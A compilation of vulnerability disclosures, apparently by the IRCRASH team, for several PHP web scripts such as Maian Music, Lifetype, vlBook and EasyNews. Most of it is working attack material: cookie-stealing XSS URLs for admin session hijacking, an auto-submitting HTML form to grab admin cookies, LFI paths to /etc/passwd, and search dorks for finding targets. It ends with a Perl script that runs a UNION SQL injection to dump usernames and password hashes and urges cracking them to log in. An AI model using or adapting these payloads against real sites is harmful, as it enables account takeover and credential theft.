Script : Maian Music v1.1 Type : Multiple Vulnerabilities (Xss/SQL Injection) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/index.php?cmd=albumalbum=[SQL INJECTION] XSS 1 : http://Example/index.php?cmd=searchkeywords=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script=scriptalert(document.cookie)/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Links v3.1 XSS Vulnerabilities
Script : Maian Links v3.1 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script3= scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
BlackBook v1.0 Multiple XSS Vulnerabilities
Script : BlackBook v1.0 Type : Multiple XSS Vulnerabilities Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://membres.lycos.fr/eejj33/download/blackbook10.zip XSS 1 : http://Example/blackbook/footer.php?bookCopyright=scriptalert(document.cookie)/script XSS 2 : http://Example/blackbook/footer.php?ver=scriptalert(document.cookie)/script XSS 3 : http://Example/blackbook/header.php?bookName=/title scriptalert(document.cookie)/script XSS 4 : http://Example/blackbook/header.php?bookMetaTags=; scriptalert(document.cookie)/script XSS 5 : http://Example/blackbook/header.php?estiloCSS=; scriptalert(document.cookie)/script Solution : Filter With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrashatgmaildotcom
Lifetype 1.2.7 XSS Vulnerability
Script : Lifetype 1.2.7 Type : XSS Vulnerabilities Discovered by : Dr.Crash Or Khashayar Fereidani Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://garr.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.7.tar.bz2 URL : http://Example/admin.php?op=editArticleCategories Method : Post variable : searchTerms Query For Send : [XSS CODE] Example : Send With Post : scriptalert(document.cookie)/script You Can Get Admin Cookie With It Upload This File And Send This Page For Admin HTML PAGE FOR GET ADMIN COOKIE : html head/head body onLoad=javascript:document.form.submit() form action=http://Example/lifetype/admin.php?op=editArticleCategories; method=POST name=form input type=hidden name=searchTerms value=#x22;#x20; [XSS CODE] /form /body /html Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
vlBook 1.21 (ALL VERSION)
Script : vlBook 1.21 (ALL VERSION)
Type : Multiple Remote Vulnerabilities (LFI/XSS)
Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)
Our Site : Http://IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://home.vlab.info/vlbook_1.21.zip
DORK : Powered by vlBook 1.21
#XSS Address : http://example/?l=; scriptalert('xss')/script
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
TNx : God..
mjguest 6.7 (ALL VERSION) Xss Redirection Vuln
Script : mjguest 6.7 (ALL VERSION) Type : Multiple Remote Vulnerabilities (XSS/REDIRECTION) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.mdsjack.bo.it/files/mjguest_6.7gt.zip #XSS REDIRECT Address : http://example/mjguest/mjguest.php?do=redirectlevel= [XSS CODE]alert=wrong_passgoto=[REDIRECT URL] You Can Get Admin Session With THis Vuln . # For Example : http://example/mjguest/mjguest.php?do=redirectlevel=scriptalert(document.cookie)/scriptalert=wrong_passgoto=http://ircrash.com TNx : God.. Khashayar Fereidani Email : [EMAIL PROTECTED]
php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)
Script : php-addressbook v2.0 Type : Multiple Remote Vulnerabilities (LFI/XSS) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr DORK : php-addressbook v2.0 - Refreshed #XSS Address : http://Example/pad/?username=; scriptalert(document.cookie)/script #LFI Address : http://Example/pad/index.php?skin=../[FILENAME]$00 TNx : God.. Khashayar Fereidani Email : irancrash[At]Gmail.com
Minibb 2.2a XSS Vulnerability
# Minibb 2.2a XSS Vulnerability # # # #AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr # # # #Script Download : http://www.minibb.net/ # # # # #XSS # #XSS Address : http://example/bb_admin.php?action=searchusers2whatus=; / scriptalert(document.cookie)/scriptsearchus=id # # # You Can Get Admin Cookie With This Vuln # # # # # Site : Http://IRCRASH.COM # #TNX GOD#
Datalife Engine 6.7 XSRF
# Datalife Engine 6.7 XSRF Vulnerability By IRCRASH # # # #Discovered by : IRCRASH (R3d.w0rm) # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # # # # #Script Download : http://datalifecms.ir/download/DatalifeEngine6.7.zip # # # # XSRF # #XSRF Address : http://site.com/datalife-path/engine/modules/imagepreview.php?image=[XSRF] # # # # Our site : Http://IRCRASH.COM # #
EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
#!/usr/bin/perl
#
EasyNews-40tr
Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
#
#
#
#Discovered by : IRCRASH By Dr.Crash
#
#Exploited By : Dr.Crash
#
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm
#
#
#
#
#
#
#Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip
#
#
#
#
#XSS
#
#XSS Address :
http://Sitename/staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_pupublishread=scriptalert(document.cookie);/script
#
#
#
#SQL
#
#SQL Address :
http://Sitename/dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers
#
#
#
#LFI
#
#SQL Address :
http://Sitename/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00
#
#
#
# Our site : Http://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print
* EasyNews-40tr Sql Injection exploit*
*AUTHOR : IRCRASH *
*Discovered by : IRCRASH TEAM BY Dr.Crash *
*Exploited by : IRCRASH TEAM BY Dr.Crash *
*Our Site : IRCRASH.COM*
;
}
sub usage
{
print
* Usage : perl $0 -url http://Sitename/
;
}
my %parameter = ();
GetOptions(\%parameter, url=s);
$url = $parameter{url};
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
$vul =
/dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers;
sub Exploit()
{
$requestpage = $url.$vul;
print Requesting Page is .$url.\n;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
#Debug Modus delete # at beginning of next line
#print $content;
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print Username: .$name.\n;
print Password: .$password.\n\n;
print Crack Md5 Password And Login In : $url/admin/\n;
print Enjoy My friend
